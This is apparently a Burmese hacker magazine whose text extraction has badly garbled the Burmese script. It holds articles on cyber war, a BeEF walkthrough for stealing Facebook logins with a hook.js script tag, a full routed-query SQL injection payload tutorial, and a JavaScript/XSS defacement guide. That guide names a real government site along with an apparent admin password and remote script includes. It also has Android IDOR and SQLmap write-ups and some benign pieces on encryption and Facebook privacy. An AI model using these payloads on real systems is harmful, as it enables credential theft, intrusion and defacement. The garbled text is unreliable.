- Cyber War ႔ ။
႔။
- Cyber Attack ႔ C D
႔ ။
- Att H P St H V T t
။
- H V St ႔ ႔ ႔ Government
Website ၊ C W t ၊M W t ။
- Political Reason ႔ ႔
႔ Cyber War ။C I t ႔ ။P t D t
၊ ၊M t D t ။C D t ။ ။

[x] GhostNet ->
Cyber War ႔ ။ ၐ
႔ ႔ Cyber Espionage Network : GhostNet ... Remote Administration Tool
(RAT) BotNet ...Canadian Report GhostNet Web Cam / Microphone
႔ Network Infected Computer ႔ device Operate
။ Download ။Computer
Full Access ႔ ။၂ ၉ March ႔။
႔ ႔ ႔ Email ၐ ။
meeting ႔
႔ meeting ႔ Warning
။ R
GhostNet ။
၁ Military / Government / Commercial
C t ၁၃
႔ ။
၁ ၃ ၁၃ D t
။C ႔ ။
GhostNet ႔ ႔ New York Time

႔ ။ Ghost Net
႔I t C t ၃
႔ ။ Bangladesh, Latvia, Indonesia,
Philippines, Brunei, Barbados, and Bhutan, embassies of India, South Korea, Romania, Cyprus,
Malta, Thailand, Taiwan, Portugal, Germany, and Pakistan ႔ ႔
၊ ဏ Asia Development Bank ၊
၊ ႔ GhostNet ႔ North Atalantic Treaty
Organization NATO ႔ ႔ ။
…… Att Access ။
Cambridge Report ႔ Attacker U Spam Mail ႔ ႔
Attachment Download Netwok ႔ ။
[x] Unit 121 ->
႔ C ႔ ႔
႔ Bureau 121 ၊ Unit 121 ႔ ႔ North Korea Cyber Warfare Agency
၁၉၉၈ ႔ ႔ ။၂ ၁၁ ႔ ဏ S C
႔ ႔ ။
႔ ႔ ။
႔ ႔ ႔ ႔
႔ ႔ ႔ ႔ ။
႔ Computer Science Professor

႔ ႔
Cyber Warfare ႔ ။ U t
L ။ ႔ /
Computer Science ႔ ႔ ။ Wiki
Specialist ၊ ႔H ႔ ။ 1800 ။
Cyber Spying ႔ ႔ ႔ ႔၈ ႔
။၂ ၁၄ ၁၁ ႔ ႔
The Interview ႔ Sony Film ႔ Internal Network hack ႔ ။
႔ Computer Screen Red Skeleton ၊ ႔ Message ႔ ႔ ။
H ႔ (GOP )Gurdian of Peace ႔ ။H Sony I t D t

Terabyte ႔ ႔ ႔ ။ Sony P
I t P E Sony ႔ ႔ O
F H t St Leaked ႔ ။R Sony
။ ႔ ႔ ။
႔ t record / proof ႔ zone-h ၂ ၁

႔ submit ႔ D t ၁၄ ႔
။ ႔ ။ zataz.com ႔ ႔ hacker ႔ ႔ whitehous-
e.gov deface ႔ ႔ ... ႔ t
႔ ႔ Defacement ။
[x] Cyber Warfare ? Why They Choose ?
။ ၂၁ C W C C ႔ ။
၂ ၇ ၂ ၉ ႔ Joint Strike Fighter F35
Lightning 2 ႔ ႔ ႔ file / data /
႔ ။ ႔ H Air Force's air traffic control
systems ႔ ႔
၇ ႔ ႔ Company ။
႔ ၐ ၃ ႔ ။ ႔
႔ Military ႔ USCyberCom ႔ ႔ ။ ႔

T ႔ Attack ႔ ႔
။ ႔ Washington CNN
႔ ႔ ႔ ။
၂၁ ႔ ႔ Computer ႔ Network ၐ ။
႔ N t I t t O
Real Life ၊
။ ႔ ။ ႔
Cyber War | Warfare in the Cyber Space ။ ။Laptop
႔ ႔ ႔ ႔ ႔ ႔ Laptop ႔
။ ႔ ႔ ႔ ႔ Cyber
A ။ C
A ႔ O ၐ ။Cyber Field
I t W P W
႔ ။
[x] Conclusions ->
႔ C W ႔ Cyber Terrorism ၊
Cyber Espionage ႔
။ ။ ၐ
႔ ႔ C W ။ Cyber ႔
။ C Att ႔ ႔ Cyber Defence
။ ႔ Cyber War ၊ Cyber War
႔ ႔ ႔
။ ။
Mg Alarm @ Myanmar Security Forum

facebook account
TaikKyi Thar
Facebook Hacking ။ ႔
Facebook Social Network
Internet facebook hacking ။
Facebook socail network ။
personal
႔ ။
။
။ skill ႔ Social
Engineering ႔ ႔ ။ ။
Kali Linux,Networking knowledge, linux knowl ႔ ။Kali Linux install ႔

။ ႔ Tool Browser Exploitation Framework (BeEF) ။
BeEF victim's browser hack ။V t ‘
Browser ႔ ။ ႔ Browser
Facebook Account ။
1. Open BeEF
Kali Linux terminal beef-xss ။
beef panel Browser ႔ ။
http://127.0.0.1:300/ui/panel
Panel ႔ Username ,password ။

2. Hook the victim's browser
t ‗H ‘ User
Browser ႔ ။ ႔ javascript code link user click
Browser ။local network Man In The Middle Attack
VPS ၐ BeEF install hack ႔ t
႔ ။ ႔ skill
။ ႔ ။Kali Linux ႔ ။ Kali
linux local ip ႔ ifconfig ႔ ။B ―G tt ‖
။

Local IP ႔ Javascript code IP ႔ ။
<script src= "http://192.168.1.101:3000/hook.js&#8221 ; type= "text/javascript" ></script>
IP 192.168.1.101 ။ ip ။
႔ javascript code webpage ႔ ။ ႔ Kali Linux
apach t ။ js code
webpage
။
save terminal service apache2 start R ။

attack User Browser ႔ ႔ ။ local ip address

http://192.168.1.101 ႔ SE victim ။
SE ။
႔ ႔ link victim ႔ panel online browser

Ip ႔ ၐ BeEF
။ ႔ facebook
command search Pretty theft ။

Execute ။ victim Browser

။
t t t email,password
႔ BeEF panel ။

facebook ။
႔ ?
Facebook Security and Loign
1. Get alerts about unrecognized on ။
2. Use tow-factor authentication on ။
3. Trusted Contacts on ။
႔ ႔ password
။F t ။
remove ။
TaikKyi Thar

Sqli Injection [ routed query]
Sql injection ။ ႔
t t ႔ ႔ ။
sql injection ။
Sql Injection ။ ႔
။ ။
Sql Injection ။
။
Injection point: http://site.com/urunler.php?id=83
Err / 83 (‘) ။
http://site.com/urunler.php?id=83‘
HATA : You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\'' at line 1
E ။Error
။
http://site.com/urunler.php?id=83 order by 1 [No Err]
http:// site.com/urunler.php?id=83 order by 2 [No Err]
http:// site.com/urunler.php?id=83 order by 11 [Err]

Unknow column 11 column 10 ။

။ :P
http://site.com/urunler.php?id=-83 Union Select 1,2,3,4,5,6,7,8,9,10
http://site.com/urunler.php?id=-83 Union Select 1,2,3,4,5,6,7,8,9,10-- -
http:// site.com /urunler.php?id=-83 div 0 Union Select

1111111,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,101
01010
Vul column ။
Source ။ ။

Routed Quey
http://site.com/urunler.php
?id=-83 div 0 Union Select

1',2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010
C 1 ' H
1‘=0 3127

0x3127,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101
010

Err :P column
?id=-83 div 0 Union Select 1 order by

1,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010
1 order by 1=0x31206f726465722062792031

0x31206f726465722062792031,2222222,3333333,4444444,55555555,66666666,77777777,888
88888,99999999,10101010
Err ၂ ။ Order by 10 ။

0x31206f72646572206279203130,2222222,3333333,4444444,55555555,66666666,77777777,8
8888888,99999999,10101010

?id=-83 div 0 Union Select 1 order by

11,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010

0x31206f72646572206279203131,2222222,3333333,4444444,55555555,66666666,77777777,8
8888888,99999999,10101010
U ‘11‘ ၁
?id=-83 div 0 Union Select 1 Union Select

1,2,3,4,5,6,7,8,9,10,2222222,3333333,4444444,55555555,66666666,77777777,88888888,999
99999,10101010

0x3120556e696f6e2053656c65637420312c322c332c342c352c362c372c382c392c3130,2222222,
3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010

V C ။ title ။

1,concat(</title><br>,222222222),3,4,5,6,7,8,9,10,2222222,3333333,4444444,55555555,666
66666,77777777,88888888,99999999,10101010

0x3120556e696f6e2053656c65637420312c636f6e636174283078336332663734363937343663
3635336533633632373233652c323232323232323232292c332c342c352c362c372c382c392c31
30,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010
Version ။
http:// site.com/urunler.php


1,concat(0x3c2f7469746c653e3c62723e,version()),3,4,5,6,7,8,9,10,2222222,3333333,4444444,
55555555,66666666,77777777,88888888,99999999,10101010

0x3120556e696f6e2053656c65637420312c636f6e6361742830783363326637343639373436633
635336533633632373233652c76657273696f6e2829292c332c342c352c362c372c382c392c3130,
2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010
DiOs

1,concat(0x3c2f7469746c653e3c62723e,(Select+export_set(5,@:=0,(select+count(*)from(infor
mation_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),col
umn_name,0xa3a,2)),@,2))),3,4,5,6,7,8,9,10,2222222,3333333,4444444,55555555,66666666,
77777777,88888888,99999999,10101010

0x3120556e696f6e2053656c65637420312c636f6e6361742830783363326637343639373436633
635336533633632373233652c2853656c6563742b6578706f72745f73657428352c403a3d302c28
73656c6563742b636f756e74282a2966726f6d28696e666f726d6174696f6e5f736368656d612e63
6f6c756d6e73297768657265403a3d6578706f72745f73657428352c6578706f72745f7365742835
2c402c7461626c655f6e616d652c307833633663363933652c32292c636f6c756d6e5f6e616d652c
30786133612c3229292c402c322929292c332c342c352c362c372c382c392c3130,2222222,33333
33,4444444,55555555,66666666,77777777,88888888,99999999,10101010

IG t t…H I t …… ။။။ S t
။
။ Union Select Union
Select Union Select ။S S t
။ Union base ။
။Injection
႔ ။ ။
Sql God BMH

CSRF(cross site request forgery)
By webkitz
(Myanmar Security Forum)
What is CSRF?
One Click Attack / Session Riding / Sea-Surf or C-Surf / XSRF ၐ ၐ

Cross Site Request Forgery(CSRF) attack web application t t t
(end user) ၄
t attacker(hacker) ။ attacker target(victim)
၄ malicious request Link / web page email /
chat social engineering . ။ victim attacker ႔ malicious link
႔ link submit button click ၄
victim / attacker t victim
႔ execute ။ victim user attacker
- victim transfer ၊
- change
web application ၐ forged request ။

၍ victim web app t t t attacker

-administrative account ၊
-admin . / ၊
- t t tt ၊
- t t / ၊
- t request ႔ administrative level victim session

riding entire web application ။ attacker
administrative access ၐ t upload web server
ၒ ။ CSRF attack t t t
t ၊ attacker . ၄
t ႔ ။
CSRF Attack (Example)
Bank website ( Eg. www.examplebank.com ) user website log

in t t t ႔ ၐ ။ web server ႔ user
login ၄ user . browser session id ႔ ။
/ user log out ။( ၍ user
log out / )။ bank website
user ႔ user account ႔ feature
႔။ (Eg. www.examplebank.com/transfer )

User .၄ form HTTP request ။
. attacker t t t . user
t . html web link social engineering . ။
Eg. www.attackerwebsite.com/winmoney.html
user bank website t t t attacker trick ၄

submit button
႔

user attacker account ႔ 100 ။

attacker ႔ malicious web link user / ႔
user bank website . / malicious
request . ။
attacker java script t t ႔

။ attacker . victim submit button
java script t t . ။
Example malicious script
CSRF attack ။
႔ CSRF attack google ႔ ။
Knowledge ႔ HTTP t ၊ ,
. POST,GET R t t ႔
။
CSRF attack 2001 OWASP . Top Ten vulnerabilities

။ world- ႔ CSRF preventing
csrf tokens , same site cookie . Anti-csrf technique ၐ

။ Is CSRF dead? . . Youtube,
Netflix, ING Direct, McAfee ၊ t csrf attack
႔ ။ ႔
anti-csrf token bypass ၐ ႔
0 ႔ ။
Webkitz(msf)

How to deface with JS or XSS defacement
႔ Sql Injection Admin User ႔ Password Shell

။ Admin User ႔ Password Shell
။ JS or XSS defacement ။ Op_Turkish 2017 ႔
Sql Injection ႔ Admin, Password Shell ႔
UGMH Defacement ႔ ။ Java Script
Defacement ။ ႔
Java script ႔ XSS ။
။
Demo ႔ Gov.bd ။
http://www.sciti-sme.gov.bd/ User Name scitisme ၊ Password 2468@sciti123 ၊
S I t ။
http://www.sciti-sme.gov.bd/admin/ Admin Login ။ Login

Admin Dashboard ။
၁။ Defacement XSS Alert ။ Deface ႔ Tag

XSS Alert ႔ ။ XSS Alert ႔ Defacement ႔ ။

Notice Info ႔ Tag Add Notice ။

( ႔ Tag ႔ )
<script>alert(0); </script> Add New Record Title Browse Pdf

S t ။ Home Page Alert 0 ႔ XSS message box
။ Alert 0 ႔ ႔ A t
Deface ႔ ။
( ႔ XSS ႔ ။ XSS alert

႔ ႔ ႔ ။) <script>alert(0); </script> ႔
bypass ။
၂။ ႔ ႔ Hosting ။ Shell
။ https://pastebin.com/H45d88BJ C yourname.js ႔ S upload
႔ ။ www.yourshellsite.com/yourname.js URL XSS Alert
။
<script src="http://www.mmsecurity.net/eval.js"></script>
႔။ ႔ eval.js ။

ၐ submit ။
Home Page Deface W D ။
၃။ Shell Folder
။ Folder deface.html Upload ။www.example.com/Folder/yourdeface.html
Deface Page ႔ https://pastebin.com/76Cmxjwg Edit
<iframe src='http://www.iran118.co.uk/ugv2.html' URL
<iframe src='www.example.com/Folder/yourdeface.html' ။ .js

႔S Shell Deface.html ႔ Folder Upload ။
URL /F / ။
Defacement ။ Photo
။
<script src="www.example.com/Folder/yourname.js"></script>
၄။ Free Hosting or Website Shell ႔ .js

။ https://pastebin.com/H45d88BJ
yourname.js ႔ S File http://yourjavascript.com/ ႔
upload ။

Processing... The file olo.js has been uploaded.Your javascript link will be sent to
donthackme@gmail.com in 5 minutes...If you have trouble to find the email, just check in bulk
folder ၐ ။
gmail ။ G Recovery ႔ ။
mail ႔ XSS Deface Script
။
၅။ Shell or Free Hosting ႔ Website Charcode

။ ။
http://jdstiles.com/java/cct.html

<script language=javascript>eval(String.fromCharCode(PLACE CharCode HERE ))</script>

႔ Charcode .js Save ။
.js http://yourjavascript.com/ ႔ Upload gmail
႔ XSS Defacement ႔ ။
၆။ Redirect Defacement ႔ tt :// / t Deface

page XSS Alert ႔ ႔ Tag Defacement ။
<META http-equiv="refresh" content="1;URL=http://example.com/yourdeface.html ">
Shell JS or XSS Defacement ႔ ႔

႔
။
Thanks for your patient,
mr.Gh0st N@0b


How I hacked Android App
Author – Thin Ba Shane ( http://location-href.com )
Table of Contents
 Introduction
 First Vulnerability – Insecure Direct Object Reference ( Web )
 Second Vulnerability – Insecure Data Storage ( Android )
 Third Vulnerability – Missing Functional Level Access Control ( Android )
Introduction
႔ M P ႔ ။M P
႔ M A ။ Android ၊ IOS
၊ Windows Operating System ၐ ။ ႔ Android
Develop A A develop
႔ ။ App Sec ႔ Android App Sec
႔ ။ UG Mangazine ႔
႔ Android App Sec ႔ ။
Android Application Security
။ ႔
႔ ႔ ။
။ ၊ Android app ႔ Java ႔
၊ C Native code ႔ ၊ ။
႔ Android App Security
၊ Web App Sec PHP ႔ ။
Online php ႔ W A jsp , asp.net ႔
႔ ၊ PHP Security ႔
႔ ။ Android App Sec A
D ႔ ။
Android App ၊ Android
၊ JVM ၊ Dalvik Machine ႔
။ ႔ ။
Android Architecture ၊ A ၊

App
။
႔ Dictionary App ၊ Android app package SQLite

Database ႔ ၐ MySQL Database ။
Web Server ႔ Database Android User Input HTTP
Request ႔ JSON response ။ Security
။ ႔ ႔ ။
Developer ႔ ။ No System is safe ႔

S ႔ ။ SQlite
႔ ႔ ႔ ။
Developer User Input SQL t I t ႔ ။
SQLite User Input SQL t D t Encrypt
႔ Insecure Data Storage ။ ႔
OWASP Mobile Top 10 ႔ ။ Credentials Dictionary
။ ႔ SQL Injection ။
Credentials ႔ ။ ။
႔ ။
Product Parameter Tampering ႔
။O ၊
။ Credentials ႔
။ ႔ ႔ ။
႔ App Banner ။ App A A t

T O ၃ ။ ႔
။ Real
World ၊ app develop
။
First Vulnerability – Insecure Direct Object Reference ( Web )
app ။ App
။ App Web Server
႔ Request Intercept (Request )
။ Intercept Burp Suite Community Edition ။ ( Intercept
Portswigger Official Documentation -
https://support.portswigger.net/customer/portal/articles/1841101-configuring-an-android-
device-to-work-with-burp ) Intercept App User
ID Web Server Request ။
www.example.com/api/v3/users/175979?app_token=qnoykn5db1E1qxd3jma2&auth_token=2
7bgAMznQHJUQyz4pQfQ&device=A176D63A805D21A819D2F1504B14968327E73A42
175979 User ID ႔ ။ ႔ User ID

Request Web Server JSON R ။
Response ။
{"id":175979,"name":"may23","dob":0,"city":" ","township":"","points":0,"phone":"9
597 52632 "," ":""," t ":" ","username":"may23","downloads_count":0,"create
d_at":1495659196,"updated_at":1501535085,"subscription_is_active":false}
I D t O t R ။ ႔
U ID ID ။ P t
Re t Parameter Tampering Parameter Manipulation ႔
ၐ ။
www.example.com/api/v3/users/another_value?app_token=qnoykn5db1E1qxd3jma2&auth_to
ken=27bgAMznQHJUQyz4pQfQ&device=A176D63A805D21A819D2F1504B14968327E73A42

Parameter Val
is_premium=true Premium User Acc ။
။( ၊ App )
{"id":180005,"name":"somename","dob":406747800,"city":" ","township":"","points
":610," ":"9599750 0 "," ":""," t ":" ","username":"someusername","do
wnloads_count":25,"created_at":1499016608,"updated_at":1501535454,"subscription_is_activ
e":false}
Points 610 Download 25 user

Access Download ။
subscription t ။
Second Vulnerability – Insecure Data Storage ( Android )
A P ။ Vulnerability ႔
႔ ႔ ။ /data/data/package_name/shared_prefs/
user.xml U D t XML ။ ADB (
Android Debug Bridge ) xml file ။ ( ADB -
http://adbshell.com/ ) ၊ Android P Root User Access
။ XML file ။
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="phone">9597xx2632xx</string>
<int name="downloads_count" value="0" />
<string
name="state">ßÇÉßÇ¡ßÇ»ßÇäßÇ╣ßÇ©/ßÇ╗ßÇòßÇèßÇ╣ßÇößÇÜßÇ╣ßÇ▒ßÇøßÇ╝ßÇ©ßÇòßÇ½</string
>
<boolean name="subscription_is_active" value="false" />
<string name="operator"></string>
<string name="city">ßü┐ßÇÖßÇ¡ßÇ│ßéòßÇößÇÜßÇ╣ßÇ▒ßÇøßÇ╝ßÇ©ßÇòßÇ½</string>
<string name="country">ßÇ╗ßÇÖßÇößÇ╣ßÇÖßÇ¼</string>
<int name="id" value="175979" />
<string name="loaded">true</string>

<string name="username">may23</string>
<string name="authentication_token">27bgAMznQHJUQyz4pQfQ</string>
<long name="updated_at" value="1495659904" />
<string name="email"></string>
<string name="name">may23</string>
<string name="dob">0</string>
<long name="created_at" value="1495659196" />
<string name="gender"></string>
<int name="points" value="0" />
<boolean name="ispremium" value="false" />
<boolean name="isFbRegister" value="false" />
</map>
Insecure Data Storage ။ D t P T t ႔ ႔

။ ။ XML Human Readable
Markup ။ XML t Web
Server R J XML ႔
။I ၊ XML file IDOR t ႔
package ? user access ။
။
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="phone">9599750xx0xx</string>
<null name="facebookID" />
<int name="downloads_count" value="38" />
<string name="state"></string>
<string name="operator">blueocean</string>
<boolean name="subscription_is_active" value="true" />

<string name="country"></string>
<string name="city"></string>
<int name="id" value="180005" />
<string name="loaded">true</string>
<string name="username">someusername</string>
<string name="authentication_token">zZmy8xwg9zxiceJu_sVf</string>
<long name="updated_at" value="1487518144" />
<string name="email"></string>
<boolean name="isPremium" value="true" />
<string name="name">somename</string>
<string name="dob">406747800</string>
<string name="gender"></string>
<long name="created_at" value="1487502183" />
<int name="points" value="650" />
<boolean name="ispremium" value="true" />
<boolean name="isFbRegister" value="false" />
</map>
။ L ။ Login App
Web Server User ID Request ။ J
။ Login ႔
။
Third Vulnerability – Missing Functional Level Access Control ( Android )
A A Androidmanifest.xml file ။ t t
content provide ။
File ။L A t t ။

Login
GreetingActivity ။ XML file edit

႔ app ။ activity manager LoginActivity Bypass ။
ADB ( ) Drozer ။ (
Drozer Manual - https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-
2015-03-23.pdf )
Final Result
ၐ acc U ID change
။
POC
POC

App Patch ။ R t App Develop

Company 250,000 MMK ။
Thin Ba Shane

Cryptography&Encryption For Beginner
Cryptography ႔ -->
(Hknudxnt) English … ႔ ။ ႔
။ – ။
႔ ၐ ။
႔ ၐ
။ ႔
႔ ။
။ ။ ႔ ။
...။ ႔ ။ ႔ ႔
။ ႔ ႔
။ ၍ ႔
႔ ။
႔ -hknudxnt ။
… ...။ ။
။ - D E ႔ ။ Y Z ႔ ။
>
h---->i
k---->l
n---->o
u---->v
d---->e
x---->y
n---->o
t---->u
hknudxnt iloveyou ႔ ..။ Encryption

႔ ၐ ။ Encryption ။
Encryption -

1. Plaintext
ၐ iloveyou -
Encryption ႔ plaintext cleartext ။ ၐ ၐ

။D t … ။
2. Algorithm
iloveyou hknudxnt ႔ ။( - I, l
) Operation ႔ ၐ operation ႔ ႔
Algorithm ႔ ၐ ။
3. Ciphertext
… t t ၐ t t ၐ data Algorithm hknudxnt

။ C t t ။
4. Encryption
Plain text Cipher text algorithm ႔

Encryption ႔ ၐ
5. Decryption
plain text ႔ Decryption ႔ ၐ ။
႔ ။

… Encryption ၊ ၊ …
။ ႔
။ ၒ
။ ႔ ႔ Cryptography ႔ ၊
။ ။ ႔
။ ႔ C t ။ ႔
။ ႔ ။ ။ ႔
။ ။ Key ႔ ၐ ။
႔ t ႔ ။
Key ၊ ႔ ။ Key
၊ ။ iloveyou ႔
။ ႔ key
။

Key 5 ။ 10 ၊3
။ ႔ key ႔ ၊ ။
… ။ encryption ။
Symmetric Encryption ...။
1. Symmetric Encryption
။ ၐ ။ ႔
encrypt ( ) Key ႔ ႔ ။
႔ Key
႔ ။ ။
။ ။ ။
2. Asymmetric Encryption
႔ ။ Key
။ Key Public key ။ Public key ႔
Encrypt ႔ ။ Private key - Private key Public Key ႔ encrypt
။ ။

- ။ ႔ ႔ Public key
။( browser ) ၍ ႔ Credit card detail
browser Public key C t t
encrypt ။ ႔ Private key
။ … …
Encryption Encrypt ? … ။
Encrypt ။
။ Custom key ႔ Encrypt ႔ ။
VPN ( ) SSL ႔
Secure Sockts Layer။ Encryption Cryptography
။
( … ႔ ႔ ။ ၐ
။ Decrypt ႔
…
PyaeSone Thura MaungMaung (PenetstVilla)
ref – Ultimate Hackers

D // D ‘t Security
By Sai Yar
https://www.saiyar.net
D D ‘t
D D ‘t
။
Magazine Security Field ( Hacking & Cracking )

၊
႔ ႔
Security 2008 ။
2007
Google Talk Recover keylogger Internet Saved
Password & Log
Forgot Password 99.99

2008 2 13
Dr.Ox
Hacking Script Kiddie
။ Dr.Ox Website Deface

Hard Core ။ (
2011 Root Creater
။ Hacking
။ hacker
။ Security Researcher Bug
Bountry ။
။
Exploit ။ Zero Days physical phishing social networking
Keylogging and Rat ။ SE ( Not software
engineering ) SE
Art of SE ။
B t ။ Cybe W
DDos
။ ။ t t
။ counter ။ server dos
B t N t ။
Dr-Rat Hacker Lammer ။
mr-noob
ၐ ။ ႔
။ t victem or zombie ။ ႔
t t ။
။
။
Cyber War ။ 2013 Indo ႔

DDos 6000 GP OP
။ indonesia.go.id ။၃ ။

M M ။ ။ 6000 ။
။ ႔
။ ၐ
B t ။
Stop Abusing Myanmar Migrant Workers >>> In Thailand
။ Et ။ ။
D t ။
။
Islam ။ Islam W t
။ ။ ။ D ‘t ။
D ‘t t t I ‘t t
။ Data Leak C Leak CW Leak ႔
။ Credit Card, Password,
B A t t t t S t
႔။ H t root R
C t Confirm Phising
။ ။ Save The Children Donate
။ ။ D ‘t ။

M4L ႔
no ethic, no respect, no rule they are just rude ။
Facebook ႔ Facebook
Social Engineering ။Facebook
recovery ၐ ။ Art of
exploit SE ။ ။
Info ။ Card
Generate ။
baby punk ghot ။ :P (
Facebook image header ။
allow ။ scan
။ ႔
။ ။
Generate ID ။
Facebook Recovery ။2007-2017 10

Recovery M t Device IP Region
။ Customer C
။ ။
။ B M
။
info
။
။ trust contact ။ ။ login
IP Region
Generate 4 16
။
Step 2 Auth ။
encrypt key user
t ID email
encrypt decrypt key ။ t ႔
႔ ႔ ။ :P
။ ။
Confidential Data ႔ ။
969 Challenge ။ Cyber Space

။
။
။
။ gov.mm hosting
။ Hack Cat ၐ
user Webhosting C
႔ ။ Socure
၊ …D ‘t ။
Do
၁- Security ။
၂ - Security Research ႔ Pentest ႔

Report ။ Bounty Hunter
B t ။
၃- Privacy ။
၄- ။
၅- Cyber Space ။ Do
။
D ‘t
၁ - t Leak
၂- t t ။ t, t , , t t …
၃- Report bounty D t Leak

( ) Ethic ။
India t
Data leak ။ bug black market ။ ၐ ၁
။ report ။

။ ethic
။
၄- C W P
။ 2012 2013 2014 C W
႔ ။ ။
။ ။
System Hack
။ Hack Attacker D t ။
။ (
t t t t
Hack Hack Attacker ။ ။ ။
။ error fix ။
D IT ( I am also Developer )
။
Coding S F t U F t ။Attacker
Research
Myanmar Cyber Space E Gov E Commerce
Attacker Ethic Privacy
။ ။
Sai Yar
www.saiyar.net

Attacking Web Service
Author : Sai Wynn Myat (Sai Lay)
Contact : fb.me/lastleaf1996 , @404death
Contents
0x01 : Introduction to Web Service
0x02 : Finding vulnerabilities
0x03 : Exploiting Demo
0x04 : Achievement
Introduction to Web Service
Web Service XML + HTTP ။
„ SOAP (Simple Object Access Protocol)
„ UDDI (Universal Description, Discovery and Integration)
„ WSDL (Web Services Description Language)
C t ။W S ?
HTML, XML, WSDL, SOAP t access

။ Java Android App PHP Web
Server Request XML data JSON Response ႔
။ W S ။

Finding Vulnerabilities
Finding vulnerablities ႔ web service

vulnerability ။
) mobile application ( app
ethic ႔ ။ ႔ public )
႔ ။ Web service app enumerate
app activate
။ activation code activate request Burpsuite
။ ( burpsuite security
)
Request burp repeater request t ။

t database code SQL injection vulnerable
႔ ။ ( vulnerab developer ႔ )
႔ manual ။ request post data sqli vuln check
။ response
Burpsuite pro version scanner Scan ႔
။ Burp pro ႔ request Text file save
SQLmap scan ။

Scan result JSON req_type is vulnerable. ႔ app SQL injection

Vulnerability ။ json JSON SQL
injection ႔ ၐ ။
Exploiting Demo
Vulnerability SQLmap text file save

request file exploit ။
Sqlmap –r request.txt --random-agent –dbs command run ။

SQLmap application database ။
Database database tables

။

G0tttt it . ^_^
application t t ၊ username t
႔ ။A t t
:P “ ( :P ―
application owner report )
။Application contact mail mail ။
Achievement

App Vulnerability report ။Local

။ ။
security hacked B ။
report ။ app data
။
ၐ
႔ ႔ ႔ B t
150,000 MMK ^_^ report ။ :P
app ။ / ၊ t
။ IT t
Security Testing / Pentesting ၐ
။ security
Bug Bounty hunting ။
Bounty ။ ၊ ဏ၊ ။
HackerOne Bugcrowd ႔ B B t t W t
t security testing B t ။
Bounty vulnerable
။ report Bounty ။
Happy hacking xD
Thanks for reading
Sai Wynn Myat (Sai Lay)


Facebook Security
၊ facebook
Account ။
။ facebook
recovery
၉
။ (၁) ႔ Account Setting ( -၁)
( -၁)
Account Setting
 General
 Security and Login
 Privacy
 Timeline and tagging ။
Security and Login ။ ( - ၂)
Security and Login facebook

႔ Login ။ ႔
႔ facebook Password ။
႔ facebook ႔ ။ ၊
႔ ႔
။ ႔ ႔
။ ၊
႔ ၊ ႔
႔ ၊ ၊ ႔ ။
။
( ႔ ။ ဏ
credit t ။
႔ ႔ ။
။
Security and Login
Get alerts about unrecognized logins On ၊( loggin

D
D ႔ ။
႔ ၊ ႔
႔ ႔ )
Choose 3 to 5 friends to contact if you get locked out t t t t ON
႔ ။(
)
Use two-factor authentication ႔

two step ႔ ။ ႔
႔
႔ ၊
႔ ။
။

Account Setting Privacy ။
Privacy
Privacy ။ ႔
႔ ။
႔ ၊ ႔
႔ ႔
႔ ။ Privacy
႔ ။ Information ႔ Security I t
Security ႔ ။ ( ႔ Hacker
။ Social Enginee -
ring ႔ ၐ SE ႔ ။) Public
႔ ႔ ။ ႔
facebook I ‘t ႔ ID
႔ ။ Privacy ။
။

Who can see your future post?
႔ friend only ႔ ။
P C P t ႔ ။
။ ႔ ။
။
၊ ၐ
။ ။
Who can see the people, Page and lists you follow?
၊ ႔ ႔ ႔ ႔ ( ႔၊
႔ like follow see first ) (
၊ like, follow, see first )
႔ ။ ႔ like, follow ႔
႔ Newsfeed ၐ ။
႔ follow ၊ page follow
။ :-P

Who can send you friend request?
Friends of friends friend request ႔ Mutual

friend ။
ၒ ။
Who can see your friends list?
friend list Only me ႔

။ friend list
႔ ႔ mutual friend ႔ ( ႔
႔ )။
။ ၐ
။
Account Setting ။ Public Post

။
„ Who can follow me
„ Public Post Comments
„ Public Profile Info

Friends Only ႔
။ (
။) ႔
။ ၊ ။
ၐ Screen Shoot ႔ ႔ ။
About SS
။ ။
ၐ SS Contact Info Only me ႔ Basic

Info ႔ ၊ ၊ Only me ၊ ၐ I ‘t
ID recovery ႔ ။ ႔ ID ႔
႔ ID ႔ ။ ႔
႔ ။
info
။
ၐ
SS ။

႔ Profile picture Activity log, Update Info, View As ႔

႔ ၐ SS
Change Profile picture, Change Cover Photo, View Privacy shortcuts, Copy
link to profile ႔ ။ View Privacy shortcuts
SS ။
SS
႔ ။
recovery ၉ % ႔ ႔ ။
( ၃ ႔ :-D )
႔ ။

How Search Engine works
Ko Thet Khine
Search engine ႔ Google ။ Google

႔ ႔ ။ S
E ႔ ႔ Computer science Information retrieval
field AI, Machine Learning, Distributed Computing
႔ ။ Information retrieval ႔ ႔ t t t
structure t t t
႔ ။ Google IR (web
information retrieval) ႔ ။ Large scale serch engine Google
index t trillion ႔
။ process ။ D t t
t t ။
Search engine . ၃ ။
Crawling
Indexing
Searching or Ranking
။ Sergey Brin . Lawrence Page paper The Anatomy of

a Large-Scale Hypertextual Web Search Engine ။

Crawling
Search ႔ internet
႔ ႔ ။ t t ၐ
save ။Crawler internet ။
။ Crawler internet ။ ႔ pag
download ။ index server ႔ ။
Crawler ။
URL Queue ႔ Crawl t t ။URL Queue

link ။ web page download ။
download web page < =‖‖> .
။ page Crawler

႔ ။ ႔ crawler t t ၐ
download ။Google Crawler
။ D t t C ။ Distribute Crawler
geographically ။ ႔ download
crawl ။ index server ။
Indexing
Indexing Crawler download ႔ t
။ ႔ ။ ႔ t
႔ ။ a,and,the ႔ t
။ programming, programmer root form program
t t index structure ႔ ။ information
retrieval field inverted index structure ႔ ။
index ။ word
။ I word web page
URL ။ data storage single
M SQL clustering ။
Ranking
႔ ။ Google PageRank Algorithm
။ PageRank ။ Ranking algorithm ။
PageRank income
-ing link ( page . outgoing link (
